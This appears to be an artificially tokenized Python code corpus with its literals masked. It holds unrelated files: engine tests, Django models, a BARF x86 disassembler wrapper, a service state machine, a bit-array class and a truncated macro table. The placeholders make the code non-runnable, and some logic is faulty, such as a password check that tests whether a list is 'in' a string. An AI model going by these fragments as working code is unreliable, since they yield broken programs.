<EOL> Y = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> with pytest . raises ( Exception ) : <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:0> ] ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) ] <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert val == - float ( '<STR_LIT>' ) <EOL> assert isinstance ( val , float ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert val == <NUM_LIT:0> <EOL> Q = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:1> , <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> val_0 = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> val_1 = engine . predictive_probability ( M_c , X_L , X_D , Y , Q [ <NUM_LIT:1> : ] ) <EOL> assert val_0 == val_1 <EOL> Q = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:0.5> ) ] <EOL> Y = [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS // <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( N_ROWS , <NUM_LIT:1> , <NUM_LIT:0.5> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> val_0 = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> val_1 = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert val_0 == val_1 <EOL> Q = [ ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:1> ) ] <EOL> Y = [ ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS // <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ) , ( N_ROWS , <NUM_LIT:1> , <NUM_LIT:0.5> ) , ( N_ROWS + <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT> ) ] <EOL> val_0 = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> val_1 = engine . simple_predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert val_0 == val_1 <EOL> Q = [ ( N_ROWS , <NUM_LIT:3> , <NUM_LIT:4> ) , ( N_ROWS , <NUM_LIT:4> , <NUM_LIT> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS , <NUM_LIT:1> , - <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert isinstance ( val , float ) <EOL> Q = [ ( N_ROWS , <NUM_LIT:0> , <NUM_LIT:1> ) , ( N_ROWS , <NUM_LIT:1> , - <NUM_LIT> ) , ( N_ROWS , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> Y = [ ( N_ROWS , <NUM_LIT:3> , <NUM_LIT:4> ) , ( N_ROWS , <NUM_LIT:4> , <NUM_LIT> ) ] <EOL> val = engine . predictive_probability ( M_c , X_L , X_D , Y , Q ) <EOL> assert isinstance ( val , float ) </s>
<s> import sys <EOL> def main ( ) : <EOL> filea = "<STR_LIT>" <EOL> a = open ( filea ) . readlines ( ) <EOL> al = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in a ] <EOL> aa = a + al <EOL> fileb = "<STR_LIT>" <EOL> b = open ( fileb ) . readlines ( ) <EOL> bl = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in b ] <EOL> bb = b + bl <EOL> filec = "<STR_LIT>" <EOL> c = open ( filec ) . readlines ( ) <EOL> cl = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in c ] <EOL> cc = c + cl <EOL> filed = "<STR_LIT>" <EOL> d = open ( filed ) . readlines ( ) <EOL> dl = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in d ] <EOL> dd = d + dl <EOL> thelist = list ( set ( aa ) & set ( bb ) & set ( cc ) & set ( dd ) ) <EOL> thelistusrlib = [ x . replace ( "<STR_LIT>" , "<STR_LIT>" ) for x in thelist ] <EOL> newlist = thelist + thelistusrlib <EOL> newlist . sort ( ) <EOL> return newlist <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> list = main ( ) <EOL> f = open ( "<STR_LIT>" , "<STR_LIT:w>" ) <EOL> for line in list : <EOL> f . write ( line ) </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> import string <EOL> REGEX_EXP = "<STR_LIT>" <EOL> PUNCTUATIONS = string . punctuation <EOL> def email_validator ( email ) : <EOL> """<STR_LIT>""" <EOL> if len ( email ) > <NUM_LIT:6> : <EOL> if re . match ( REGEX_EXP , email ) != None : <EOL> return True <EOL> return False <EOL> def password_validator ( password ) : <EOL> """<STR_LIT>""" <EOL> if list ( PUNCTUATIONS ) in password : <EOL> """<STR_LIT>""" <EOL> return False <EOL> else : <EOL> return True </s>
<s> from django . db import models <EOL> from django . contrib . auth . models import User <EOL> from cmdb . models import ConfigurationItem <EOL> class OrchestraClass ( models . Model ) : <EOL> Name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> Creator = models . ForeignKey ( User ) <EOL> Notes = models . TextField ( ) <EOL> AffectedItems = models . ManyToManyField ( ConfigurationItem ) <EOL> def __unicode__ ( self ) : <EOL> return self . Name <EOL> class Meta : <EOL> verbose_name = '<STR_LIT>' <EOL> verbose_name_plural = '<STR_LIT>' <EOL> ordering = [ '<STR_LIT:Name>' ] <EOL> class OrchestraMetaDataName ( models . Model ) : <EOL> Name = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> def __unicode__ ( self ) : <EOL> return self . Name <EOL> class Meta : <EOL> verbose_name = '<STR_LIT>' <EOL> ordering = [ '<STR_LIT:Name>' ] <EOL> class OrchestraMetaDataValue ( models . Model ) : <EOL> Name = models . ForeignKey ( OrchestraMetaDataName ) <EOL> Value = models . CharField ( max_length = <NUM_LIT:255> ) <EOL> AffectedItems = models . ManyToManyField ( ConfigurationItem ) <EOL> def __unicode__ ( self ) : <EOL> return u'<STR_LIT>' % ( self . Name , self . Value ) </s>
<s> """<STR_LIT>""" <EOL> from capstone import * <EOL> from barf . arch import ARCH_X86_MODE_32 <EOL> from barf . arch import ARCH_X86_MODE_64 <EOL> from barf . arch . x86 . x86parser import X86Parser <EOL> from barf . core . disassembler import Disassembler <EOL> class X86Disassembler ( Disassembler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , architecture_mode = ARCH_X86_MODE_32 ) : <EOL> super ( X86Disassembler , self ) . __init__ ( ) <EOL> arch_mode_map = { <EOL> ARCH_X86_MODE_32 : CS_MODE_32 , <EOL> ARCH_X86_MODE_64 : CS_MODE_64 <EOL> } <EOL> self . _parser = X86Parser ( architecture_mode ) <EOL> self . _disassembler = Cs ( CS_ARCH_X86 , arch_mode_map [ architecture_mode ] ) <EOL> def disassemble ( self , data , address ) : <EOL> """<STR_LIT>""" <EOL> asm , size = self . _cs_disassemble_one ( data , address ) <EOL> instr = self . _parser . parse ( asm ) if asm else None <EOL> if instr : <EOL> instr . address = address <EOL> instr . size = size <EOL> instr . bytes = data [ <NUM_LIT:0> : size ] <EOL> return instr <EOL> def disassemble_all ( self , data , address ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> def _cs_disassemble_one ( self , data , address ) : <EOL> """<STR_LIT>""" <EOL> asm , size = "<STR_LIT>" , <NUM_LIT:0> <EOL> disasm = list ( self . _disassembler . disasm_lite ( data , address ) ) <EOL> if len ( disasm ) > <NUM_LIT:0> : <EOL> address , size , mnemonic , op_str = disasm [ <NUM_LIT:0> ] <EOL> asm = str ( mnemonic + "<STR_LIT:U+0020>" + op_str ) . strip ( ) <EOL> if asm in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> asm , size = "<STR_LIT>" , <NUM_LIT:0> <EOL> return asm , size </s>
<s> import os <EOL> import sys <EOL> from barf . barf import BARF <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> try : <EOL> filename = os . path . abspath ( "<STR_LIT>" ) <EOL> barf = BARF ( filename ) <EOL> except Exception as err : <EOL> print err <EOL> print "<STR_LIT>" % filename <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> print ( "<STR_LIT>" ) <EOL> for addr , asm_instr , reil_instrs in barf . translate ( ) : <EOL> print ( "<STR_LIT>" . format ( addr , asm_instr ) ) <EOL> for reil_instr in reil_instrs : <EOL> print ( "<STR_LIT>" . format ( "<STR_LIT>" , reil_instr ) ) <EOL> try : <EOL> smt_exprs = barf . smt_translator . translate ( reil_instr ) <EOL> for smt_expr in smt_exprs : <EOL> print ( "<STR_LIT>" . format ( "<STR_LIT>" , smt_expr ) ) <EOL> except : <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import datetime <EOL> from django . utils . timezone import utc <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . DateField ( default = datetime . datetime ( <NUM_LIT> , <NUM_LIT:6> , <NUM_LIT:9> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:8> , <NUM_LIT> , tzinfo = utc ) , auto_now_add = True ) , <EOL> preserve_default = False , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> import runpy <EOL> from . util import AbstractStateMachine <EOL> from . util import defaultproperty <EOL> from . import Setting <EOL> def require_ready ( func ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( func ) <EOL> def wrapped ( self , * args , ** kwargs ) : <EOL> try : <EOL> self . state . wait ( "<STR_LIT>" , self . ready_timeout ) <EOL> except Exception , e : <EOL> pass <EOL> if not self . ready : <EOL> raise RuntimeWarning ( "<STR_LIT>" ) <EOL> return func ( self , * args , ** kwargs ) <EOL> return wrapped <EOL> def autospawn ( func ) : <EOL> """<STR_LIT>""" <EOL> @ functools . wraps ( func ) <EOL> def wrapped ( self , * args , ** kwargs ) : <EOL> self . spawn ( func , self , * args , ** kwargs ) <EOL> return wrapped <EOL> class ServiceStateMachine ( AbstractStateMachine ) : <EOL> """<STR_LIT>""" <EOL> initial_state = "<STR_LIT>" <EOL> allow_wait = [ "<STR_LIT>" , "<STR_LIT>" ] <EOL> event_start = [ "<STR_LIT>" , "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" <EOL> event_ready = [ "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" <EOL> event_stop = [ "<STR_LIT>" , "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" <EOL> event_stopped = [ "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" <EOL> class BasicService ( object ) : <EOL> _statemachine_class = ServiceStateMachine <EOL> _children = defaultproperty ( list ) <EOL> start_timeout = defaultproperty ( int , <NUM_LIT:2> ) <EOL> start_before = defaultproperty ( bool , False ) <EOL> def pre_init ( self ) : <EOL> pass <EOL> def __new__ ( cls , * args , ** kwargs ) : <EOL> s = super ( BasicService , cls ) . __new__ ( cls , * args , ** kwargs ) <EOL> s . pre_init ( ) <EOL> s . state = cls . _statemachine_class ( s ) <EOL> return s <EOL> @ property <EOL> def service_name ( self ) : <EOL> return self . __class__ . __name__ <EOL> @ property <EOL> def ready ( self ) : <EOL> return self . state . current == '<STR_LIT>' <EOL> def add_service ( self , service ) : <EOL> """<STR_LIT>""" <EOL> self . _children . append ( service ) <EOL> def remove_service ( self , service ) : <EOL> """<STR_LIT>""" <EOL> self . _children . remove ( service ) <EOL> def start ( self , block_until_ready = True ) : <EOL> """<STR_LIT>""" <EOL> self . state ( "<STR_LIT:start>" ) <EOL> if self . start_before : <EOL> self . do_start ( ) <EOL> for child in self . _children : <EOL> if child . state . current not in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> child . start ( block_until_ready ) <EOL> if not self . start_before : <EOL> ready = not self . do_start ( ) <EOL> if not ready and block_until_ready is True : <EOL> self . state . wait ( "<STR_LIT>" , self . start_timeout ) <EOL> elif ready : <EOL> self . state ( "<STR_LIT>" ) <EOL> else : <EOL> self . state ( "<STR_LIT>" ) <EOL> def pre_start ( self ) : <EOL> pass <EOL> def do_start ( self ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def post_start ( self ) : <EOL> pass <EOL> def stop ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . state . current in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> return <EOL> ready_before_stop = self . ready <EOL> self . state ( "<STR_LIT>" ) <EOL> for child in reversed ( self . _children ) : <EOL> child . stop ( ) <EOL> if ready_before_stop : <EOL> self . do_stop ( ) <EOL> self . state ( "<STR_LIT>" ) <EOL> def pre_stop ( self ) : <EOL> pass <EOL> def post_stop ( self ) : <EOL> pass <EOL> def do_stop ( self ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def reload ( self ) : <EOL> def _reload_children ( ) : <EOL> for child in self . _children : <EOL> child . reload ( ) <EOL> if self . start_before : <EOL> self . do_reload ( ) <EOL> _reload_children ( ) <EOL> else : <EOL> _reload_children ( ) <EOL> self . do_reload ( ) <EOL> def do_reload ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def serve_forever ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . start ( ) <EOL> except RuntimeWarning , e : <EOL> pass <EOL> self . state . wait ( "<STR_LIT>" ) <EOL> def __enter__ ( self ) : <EOL> self . start ( ) <EOL> return self <EOL> def __exit__ ( self , type , value , traceback ) : <EOL> self . stop ( ) <EOL> class Service ( BasicService ) : <EOL> async_available = [ "<STR_LIT>" + m for m in ( "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ) ] <EOL> async = Setting ( "<STR_LIT>" , default = "<STR_LIT>" , help = """<STR_LIT>""" ) <EOL> def pre_init ( self ) : <EOL> try : <EOL> mod = runpy . run_module ( self . async ) <EOL> self . async = mod [ '<STR_LIT>' ] ( ) <EOL> self . add_service ( self . async ) <EOL> except ( NotImplementedError , ImportError ) as e : <EOL> if self . async not in self . async_available : <EOL> helptext = ( "<STR_LIT>" <EOL> + "<STR_LIT>" . join ( self . async_available ) ) <EOL> elif self . async . endswith ( "<STR_LIT>" ) : <EOL> helptext = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> helptext = "<STR_LIT>" <EOL> raise RuntimeError ( <EOL> "<STR_LIT>" . format ( self . async , <EOL> helptext ) ) <EOL> def spawn ( self , * args , ** kwargs ) : <EOL> return self . async . spawn ( * args , ** kwargs ) <EOL> def spawn_later ( self , * args , ** kwargs ) : <EOL> return self . async . spawn_later ( * args , ** kwargs ) </s>
<s> """<STR_LIT>""" <EOL> import array <EOL> hxh = { '<STR_LIT:0>' : <NUM_LIT:0> , '<STR_LIT:1>' : <NUM_LIT:1> , '<STR_LIT:2>' : <NUM_LIT:2> , '<STR_LIT:3>' : <NUM_LIT:3> , '<STR_LIT:4>' : <NUM_LIT:4> , <EOL> '<STR_LIT:5>' : <NUM_LIT:5> , '<STR_LIT>' : <NUM_LIT:6> , '<STR_LIT>' : <NUM_LIT:7> , '<STR_LIT>' : <NUM_LIT:8> , '<STR_LIT>' : <NUM_LIT:9> , <EOL> '<STR_LIT:A>' : <NUM_LIT:10> , '<STR_LIT:B>' : <NUM_LIT:11> , '<STR_LIT:C>' : <NUM_LIT:12> , <EOL> '<STR_LIT:D>' : <NUM_LIT> , '<STR_LIT:E>' : <NUM_LIT> , '<STR_LIT:F>' : <NUM_LIT:15> <EOL> } <EOL> hxd = u'<STR_LIT>' <EOL> sel = [ <NUM_LIT:0> <NUM_LIT:200> , <NUM_LIT:0> <NUM_LIT:100> , <NUM_LIT> <NUM_LIT> , <NUM_LIT> <NUM_LIT:20> , <NUM_LIT> <NUM_LIT:10> , <NUM_LIT> <NUM_LIT:4> , <NUM_LIT> <NUM_LIT:2> , <NUM_LIT> <NUM_LIT:1> ] <EOL> N = len ( sel ) <EOL> nB = <NUM_LIT:2> <EOL> def _com ( x ) : return ( <NUM_LIT:255> - x ) <EOL> def getByteCountFor ( nbc ) : <EOL> """<STR_LIT>""" <EOL> n , m = divmod ( nbc , N ) <EOL> if m > <NUM_LIT:0> : n += <NUM_LIT:1> <EOL> return n <EOL> def join ( a , b ) : <EOL> """<STR_LIT>""" <EOL> return a . data + b . data <EOL> def check ( bs , ps ) : <EOL> """<STR_LIT>""" <EOL> n = len ( bs ) <EOL> for i in range ( n ) : <EOL> if ( bs [ i ] & ps [ i ] ) != <NUM_LIT:0> : return False <EOL> return True <EOL> def show ( bs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return '<STR_LIT:U+0020>' . join ( map ( lambda b : '<STR_LIT>' . format ( b ) , bs ) ) <EOL> except ValueError : <EOL> return '<STR_LIT>' <EOL> class EllyBits ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nob = nB * N ) : <EOL> """<STR_LIT>""" <EOL> n = getByteCountFor ( nob ) <EOL> self . data = array . array ( '<STR_LIT:B>' , ( <NUM_LIT:0> , ) * n ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' + show ( self . data ) <EOL> def set ( self , k ) : <EOL> """<STR_LIT>""" <EOL> n , m = divmod ( k , N ) <EOL> if n >= len ( self . data ) : return <EOL> self . data [ n ] |= sel [ m ] <EOL> def test ( self , k ) : <EOL> """<STR_LIT>""" <EOL> n , m = divmod ( k , N ) <EOL> if n >= len ( self . data ) : return False <EOL> return ( self . data [ n ] & sel [ m ] ) != <NUM_LIT:0> <EOL> def match ( self , r ) : <EOL> """<STR_LIT>""" <EOL> m = len ( self . data ) <EOL> n = len ( r . data ) <EOL> if n > m : n = m <EOL> for i in range ( n ) : <EOL> if _com ( self . data [ i ] ) & r . data [ i ] != <NUM_LIT:0> : return False <EOL> return True <EOL> def equal ( self , r ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( r . data ) ) : <EOL> if self . data [ i ] != r . data [ i ] : return False <EOL> return True <EOL> def intersect ( self , r ) : <EOL> """<STR_LIT>""" <EOL> m = len ( self . data ) <EOL> n = len ( r . data ) <EOL> if n > m : n = m <EOL> for i in range ( n ) : <EOL> if self . data [ i ] & r . data [ i ] != <NUM_LIT:0> : return True <EOL> return False <EOL> def zeroed ( self ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( self . data ) ) : <EOL> if self . data [ i ] != <NUM_LIT:0> : return False <EOL> return True <EOL> def clear ( self ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( self . data ) ) : self . data [ i ] = <NUM_LIT:0> <EOL> def complement ( self ) : <EOL> """<STR_LIT>""" <EOL> for i in range ( len ( self . data ) ) : self . data [ i ] = _com ( self . data [ i ] ) <EOL> def combine ( self , r ) : <EOL> """<STR_LIT>""" <EOL> m = len ( self . data ) <EOL> n = len ( r . data ) <EOL> if n > m : n = m <EOL> for i in range ( n ) : <EOL> self . data [ i ] |= r . data [ i ] <EOL> def reset ( self , r ) : <EOL> """<STR_LIT>""" <EOL> m = len ( self . data ) <EOL> n = len ( r . data ) <EOL> if n > m : n = m <EOL> for i in range ( n ) : <EOL> self . data [ i ] &= r . data [ i ] <EOL> def compound ( self ) : <EOL> """<STR_LIT>""" <EOL> cm = map ( lambda x : _com ( x ) , self . data ) <EOL> return array . array ( '<STR_LIT:B>' , cm ) + self . data <EOL> def hexadecimal ( self , divide = True ) : <EOL> """<STR_LIT>""" <EOL> bs = [ ] <EOL> for b in self . data : <EOL> n , m = divmod ( b , <NUM_LIT:16> ) <EOL> bs . append ( hxd [ n ] ) <EOL> bs . append ( hxd [ m ] ) <EOL> if divide : <EOL> bs . append ( '<STR_LIT:U+0020>' ) <EOL> return '<STR_LIT>' . join ( bs ) . rstrip ( ) <EOL> def reinit ( self , hexb ) : <EOL> """<STR_LIT>""" <EOL> ln = len ( self . data ) <EOL> if len ( hexb ) // <NUM_LIT:2> != ln : return <EOL> for i in range ( ln ) : <EOL> bs = hexb [ : <NUM_LIT:2> ] <EOL> hexb = hexb [ <NUM_LIT:2> : ] <EOL> self . data [ i ] = <NUM_LIT:16> * hxh [ bs [ <NUM_LIT:0> ] ] + hxh [ bs [ <NUM_LIT:1> ] ] <EOL> def count ( self ) : <EOL> """<STR_LIT>""" <EOL> return len ( self . data ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> K = <NUM_LIT:12> <EOL> bbs = EllyBits ( K ) <EOL> bbs . set ( <NUM_LIT:0> ) <EOL> bbs . set ( <NUM_LIT:6> ) <EOL> bbs . set ( <NUM_LIT:11> ) <EOL> print '<STR_LIT>' , bbs <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> bbt = EllyBits ( K ) <EOL> bbt . set ( <NUM_LIT:9> ) <EOL> print "<STR_LIT>" , bbt . data , "<STR_LIT>" , bbt . hexadecimal ( ) <EOL> bbs . combine ( bbt ) <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> print "<STR_LIT>" , bbs . test ( <NUM_LIT:9> ) <EOL> print "<STR_LIT>" , bbs . test ( <NUM_LIT:10> ) <EOL> print "<STR_LIT>" , bbs . test ( <NUM_LIT:11> ) <EOL> cbs = bbs . compound ( ) <EOL> print "<STR_LIT>" , type ( cbs ) , show ( cbs ) <EOL> pbs = EllyBits ( K ) <EOL> nbs = EllyBits ( K ) <EOL> pbs . set ( <NUM_LIT:6> ) <EOL> nbs . set ( <NUM_LIT:7> ) <EOL> print '<STR_LIT>' , pbs . hexadecimal ( ) <EOL> print '<STR_LIT>' , nbs . hexadecimal ( ) <EOL> tbs = join ( pbs , nbs ) <EOL> print "<STR_LIT>" , type ( tbs ) , show ( tbs ) <EOL> print '<STR_LIT>' , check ( cbs , tbs ) <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> bbs . complement ( ) <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> bbs . clear ( ) <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> pbs . set ( <NUM_LIT:7> ) <EOL> print '<STR_LIT>' , pbs . hexadecimal ( ) , '<STR_LIT>' , nbs . hexadecimal ( ) <EOL> print '<STR_LIT>' , pbs . equal ( nbs ) <EOL> print '<STR_LIT>' , pbs . match ( nbs ) <EOL> print '<STR_LIT>' , nbs . match ( pbs ) <EOL> nbs . set ( <NUM_LIT:6> ) <EOL> print '<STR_LIT>' , nbs . hexadecimal ( ) <EOL> print '<STR_LIT>' , pbs . equal ( nbs ) <EOL> bbs . reinit ( '<STR_LIT>' ) <EOL> print '<STR_LIT>' <EOL> print "<STR_LIT>" , bbs . data , "<STR_LIT>" , bbs . hexadecimal ( ) <EOL> bbs . reinit ( '<STR_LIT>' ) <EOL> print '<STR_LIT>' <EOL> print '<STR_LIT:=>' , bbs . hexadecimal ( False ) <EOL> print '<STR_LIT>' <EOL> rbs = EllyBits ( K ) <EOL> rbs . reinit ( '<STR_LIT>' ) <EOL> bbs . reset ( rbs ) <EOL> print '<STR_LIT:=>' , bbs . hexadecimal ( False ) <EOL> bbs . reinit ( '<STR_LIT>' ) <EOL> print '<STR_LIT:=>' , bbs , '<STR_LIT>' , bbs . zeroed ( ) <EOL> bbs . set ( <NUM_LIT:1> ) <EOL> print '<STR_LIT:=>' , bbs , '<STR_LIT>' , bbs . zeroed ( ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import ellyChar <EOL> import ellyWildcard <EOL> import ellyException <EOL> import definitionLine <EOL> special = ellyWildcard . Separate <EOL> def _checkBindings ( left , right ) : <EOL> """<STR_LIT>""" <EOL> mxb = '<STR_LIT:0>' <EOL> k = <NUM_LIT:0> <EOL> l = len ( right ) <EOL> while k < l : <EOL> c = right [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c == '<STR_LIT:\\>' : <EOL> if k == l : <EOL> break <EOL> b = right [ k ] <EOL> k += <NUM_LIT:1> <EOL> if '<STR_LIT:1>' <= b and b <= '<STR_LIT>' : <EOL> if mxb < b : mxb = b <EOL> if mxb == '<STR_LIT:0>' : return True <EOL> m = int ( mxb ) <EOL> n = <NUM_LIT:0> <EOL> k = <NUM_LIT:0> <EOL> l = len ( left ) <EOL> while True : <EOL> while k < l : <EOL> c = left [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c in special : <EOL> n += <NUM_LIT:1> <EOL> elif ellyWildcard . isWild ( c ) : <EOL> if c != ellyWildcard . cEND : n += <NUM_LIT:1> <EOL> break <EOL> if k == l : <EOL> break <EOL> while k < l : <EOL> c = left [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c in special : <EOL> n += <NUM_LIT:1> <EOL> break <EOL> elif not ellyWildcard . isWild ( c ) : <EOL> break <EOL> return ( m <= n ) <EOL> def _checkExpansion ( left , right ) : <EOL> """<STR_LIT>""" <EOL> nh = <NUM_LIT:0> <EOL> n = <NUM_LIT:0> <EOL> k = <NUM_LIT:0> <EOL> l = len ( left ) <EOL> while k < l : <EOL> c = left [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c == '<STR_LIT:->' : <EOL> n += <NUM_LIT:1> <EOL> nh += <NUM_LIT:1> <EOL> elif c != '<STR_LIT:U+0020>' and c != '<STR_LIT:_>' : <EOL> if not ellyWildcard . isWild ( c ) : <EOL> n += <NUM_LIT:1> <EOL> mh = <NUM_LIT:0> <EOL> m = <NUM_LIT:0> <EOL> k = <NUM_LIT:0> <EOL> l = len ( right ) <EOL> while k < l : <EOL> c = right [ k ] <EOL> k += <NUM_LIT:1> <EOL> if c == '<STR_LIT:->' : <EOL> m += <NUM_LIT:1> <EOL> mh += <NUM_LIT:1> <EOL> elif c != '<STR_LIT:U+0020>' and c != '<STR_LIT:_>' : <EOL> if k == l : <EOL> m += <NUM_LIT:1> <EOL> elif c == '<STR_LIT:\\>' : <EOL> d = right [ k ] <EOL> if '<STR_LIT:1>' > d or d > '<STR_LIT>' : <EOL> m += <NUM_LIT:1> <EOL> else : <EOL> k += <NUM_LIT:1> <EOL> else : <EOL> m += <NUM_LIT:1> <EOL> if m <= n : return True <EOL> n -= nh <EOL> m -= mh <EOL> return ( m <= n ) <EOL> class MacroTable ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , defs = None , nowarn = False ) : <EOL> """<STR_LIT>""" <EOL> lim = ellyChar . Max + <NUM_LIT:11> <EOL> self . index = [ [ ] <EOL> for i in range ( lim ) ] <EOL> self . letWx = [ ] <EOL> self . digWx = [ ] <EOL> self . anyWx = [ ] <EOL> self . count = <NUM_LIT:0> <EOL> self . _errcount = <NUM_LIT:0> <EOL> if defs != None : <EOL> self . _store ( defs , nowarn ) <EOL> def _err ( self , s = '<STR_LIT>' , l = '<STR_LIT>' , d = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . _errcount += d <EOL> m = '<STR_LIT:error>' if d == <NUM_LIT:1> else '<STR_LIT>' <EOL> print >> sys . stderr , '<STR_LIT>' + m + '<STR_LIT::>' , s <EOL> if l != '<STR_LIT>' : <EOL> print >> sys . stderr , '<STR_LIT>' , l , '<STR_LIT:]>' <EOL> def getRules ( self , a ) : <EOL> """<STR_LIT>""" <EOL> if a == '<STR_LIT>' : return [ ] <EOL> if ellyChar . isLetterOrDigit ( a ) : <EOL> k = ellyChar . toIndex ( a ) <EOL> ws = self . letWx if ellyChar . isLetter ( a ) else self . digWx <EOL> ls = self . index [ k ] + ws + self . anyWx <EOL> else : <EOL> ls = self . index [ <NUM_LIT:0> ] + self . anyWx <EOL> return ls <EOL> def _store ( self , defs , nowarn ) : <EOL> """<STR_LIT>""" <EOL> while True : <EOL> l = defs . readline ( ) <EOL> if len ( l ) == <NUM_LIT:0> : break <EOL> dl = definitionLine . DefinitionLine ( l , False ) <EOL> left = dl . left <EOL> tail = dl . tail <EOL> if left == None or tail == None : <EOL> self . _err ( l = l ) <EOL> continue <EOL> pat = ellyWildcard . convert ( left ) <EOL> if pat == None : <EOL> self . _err ( '<STR_LIT>' , l ) <EOL> continue <EOL> pe = pat [ - <NUM_LIT:1> ] <EOL> if pe != ellyWildcard . cALL and pe != ellyWildcard . cEND : <EOL> pat += ellyWildcard . cEND <EOL> if not _checkBindings ( pat , tail ) : <EOL> self . _err ( '<STR_LIT>' , l ) <EOL> continue <EOL> if not nowarn and not _checkExpansion ( pat , tail ) : <EOL> self . _err ( '<STR_LIT>' , l , <NUM_LIT:0> ) <EOL> if pat == None : <EOL> self . _err ( '<STR_LIT>' , l ) <EOL> continue <EOL> r = [ pat , tail ] <EOL> c = pat [ <NUM_LIT:0> ] <EOL> p = pat <EOL> while c == 